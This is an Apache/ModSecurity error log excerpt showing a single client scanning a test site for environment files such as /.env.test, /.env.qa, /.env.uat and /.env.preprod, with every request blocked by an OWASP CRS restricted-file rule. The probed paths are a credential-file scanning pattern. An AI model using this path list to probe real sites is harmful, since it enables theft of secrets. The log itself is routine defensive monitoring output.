[Fri Jan 16 03:14:01.409639 2026] [:error] [pid 1444040] [client 45.148.10.246:36366] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.develop"] [unique_id "aWme6fn_5sIyKhJ5GAzXqgAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./.env.develop
[Fri Jan 16 03:14:01.565356 2026] [:error] [pid 1444031] [client 45.148.10.246:36382] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWme6X-9MmrgwjmYTAJQZgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.test
[Fri Jan 16 03:14:01.565594 2026] [:error] [pid 1444031] [client 45.148.10.246:36382] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWme6X-9MmrgwjmYTAJQZgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.test
[Fri Jan 16 03:14:01.565753 2026] [:error] [pid 1444031] [client 45.148.10.246:36382] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWme6X-9MmrgwjmYTAJQZgAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.test
[Fri Jan 16 03:14:01.938333 2026] [:error] [pid 1444034] [client 45.148.10.246:36398] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWme6eRfEYyDES-ZFL4ggwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.test
[Fri Jan 16 03:14:01.938722 2026] [:error] [pid 1444034] [client 45.148.10.246:36398] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWme6eRfEYyDES-ZFL4ggwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.test
[Fri Jan 16 03:14:01.938992 2026] [:error] [pid 1444034] [client 45.148.10.246:36398] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWme6eRfEYyDES-ZFL4ggwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.test
[Fri Jan 16 03:14:02.142063 2026] [:error] [pid 1444032] [client 45.148.10.246:36402] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWme6ukMvq8uPO2ZciWoggAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.test
[Fri Jan 16 03:14:02.142311 2026] [:error] [pid 1444032] [client 45.148.10.246:36402] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWme6ukMvq8uPO2ZciWoggAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.test
[Fri Jan 16 03:14:02.142500 2026] [:error] [pid 1444032] [client 45.148.10.246:36402] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWme6ukMvq8uPO2ZciWoggAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.test
[Fri Jan 16 03:14:02.312313 2026] [:error] [pid 1444226] [client 45.148.10.246:36404] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.testing"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.testing"] [unique_id "aWme6mcpoCUgeFICb0bc0wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.testing
[Fri Jan 16 03:14:02.312535 2026] [:error] [pid 1444226] [client 45.148.10.246:36404] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.testing"] [unique_id "aWme6mcpoCUgeFICb0bc0wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.testing
[Fri Jan 16 03:14:02.312709 2026] [:error] [pid 1444226] [client 45.148.10.246:36404] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.testing"] [unique_id "aWme6mcpoCUgeFICb0bc0wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.testing
[Fri Jan 16 03:14:03.302860 2026] [:error] [pid 1444031] [client 45.148.10.246:36442] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.qa/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.qa/"] [unique_id "aWme63-9MmrgwjmYTAJQZwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.qa/
[Fri Jan 16 03:14:03.303099 2026] [:error] [pid 1444031] [client 45.148.10.246:36442] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.qa/"] [unique_id "aWme63-9MmrgwjmYTAJQZwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.qa/
[Fri Jan 16 03:14:03.303261 2026] [:error] [pid 1444031] [client 45.148.10.246:36442] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.qa/"] [unique_id "aWme63-9MmrgwjmYTAJQZwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.qa/
[Fri Jan 16 03:14:03.433655 2026] [:error] [pid 1444033] [client 45.148.10.246:36444] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.qa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.qa"] [unique_id "aWme69LJkp65ULFQ2YYgkAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.qa
[Fri Jan 16 03:14:03.433873 2026] [:error] [pid 1444033] [client 45.148.10.246:36444] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.qa"] [unique_id "aWme69LJkp65ULFQ2YYgkAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.qa
[Fri Jan 16 03:14:03.434028 2026] [:error] [pid 1444033] [client 45.148.10.246:36444] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.qa"] [unique_id "aWme69LJkp65ULFQ2YYgkAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.qa
[Fri Jan 16 03:14:03.570933 2026] [:error] [pid 1444034] [client 45.148.10.246:36448] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.qa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.qa"] [unique_id "aWme6-RfEYyDES-ZFL4ghAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.qa
[Fri Jan 16 03:14:03.571161 2026] [:error] [pid 1444034] [client 45.148.10.246:36448] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.qa"] [unique_id "aWme6-RfEYyDES-ZFL4ghAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.qa
[Fri Jan 16 03:14:03.571362 2026] [:error] [pid 1444034] [client 45.148.10.246:36448] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.qa"] [unique_id "aWme6-RfEYyDES-ZFL4ghAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.qa
[Fri Jan 16 03:14:03.704879 2026] [:error] [pid 1444032] [client 45.148.10.246:36462] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.uat"] [unique_id "aWme6-kMvq8uPO2ZciWogwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.uat
[Fri Jan 16 03:14:03.705113 2026] [:error] [pid 1444032] [client 45.148.10.246:36462] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.uat"] [unique_id "aWme6-kMvq8uPO2ZciWogwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.uat
[Fri Jan 16 03:14:03.705280 2026] [:error] [pid 1444032] [client 45.148.10.246:36462] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.uat"] [unique_id "aWme6-kMvq8uPO2ZciWogwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.uat
[Fri Jan 16 03:14:03.858836 2026] [:error] [pid 1444226] [client 45.148.10.246:36464] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.uat/"] [unique_id "aWme62cpoCUgeFICb0bc1AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.uat/
[Fri Jan 16 03:14:03.859055 2026] [:error] [pid 1444226] [client 45.148.10.246:36464] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.uat/"] [unique_id "aWme62cpoCUgeFICb0bc1AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.uat/
[Fri Jan 16 03:14:03.859207 2026] [:error] [pid 1444226] [client 45.148.10.246:36464] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.uat/"] [unique_id "aWme62cpoCUgeFICb0bc1AAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.uat/
[Fri Jan 16 03:14:04.002995 2026] [:error] [pid 1444040] [client 45.148.10.246:36470] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.uat"] [unique_id "aWme7Pn_5sIyKhJ5GAzXqwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.uat
[Fri Jan 16 03:14:04.003238 2026] [:error] [pid 1444040] [client 45.148.10.246:36470] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.uat"] [unique_id "aWme7Pn_5sIyKhJ5GAzXqwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.uat
[Fri Jan 16 03:14:04.003421 2026] [:error] [pid 1444040] [client 45.148.10.246:36470] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.uat"] [unique_id "aWme7Pn_5sIyKhJ5GAzXqwAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.uat
[Fri Jan 16 03:14:04.140367 2026] [:error] [pid 1444031] [client 45.148.10.246:36472] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.uat"] [unique_id "aWme7H-9MmrgwjmYTAJQaAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.uat
[Fri Jan 16 03:14:04.140604 2026] [:error] [pid 1444031] [client 45.148.10.246:36472] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.uat"] [unique_id "aWme7H-9MmrgwjmYTAJQaAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.uat
[Fri Jan 16 03:14:04.140760 2026] [:error] [pid 1444031] [client 45.148.10.246:36472] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.uat"] [unique_id "aWme7H-9MmrgwjmYTAJQaAAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.uat
[Fri Jan 16 03:14:04.286092 2026] [:error] [pid 1444033] [client 45.148.10.246:36482] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.preprod"] [unique_id "aWme7NLJkp65ULFQ2YYgkQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.preprod
[Fri Jan 16 03:14:04.286328 2026] [:error] [pid 1444033] [client 45.148.10.246:36482] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.preprod"] [unique_id "aWme7NLJkp65ULFQ2YYgkQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.preprod
[Fri Jan 16 03:14:04.286519 2026] [:error] [pid 1444033] [client 45.148.10.246:36482] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.preprod"] [unique_id "aWme7NLJkp65ULFQ2YYgkQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.preprod
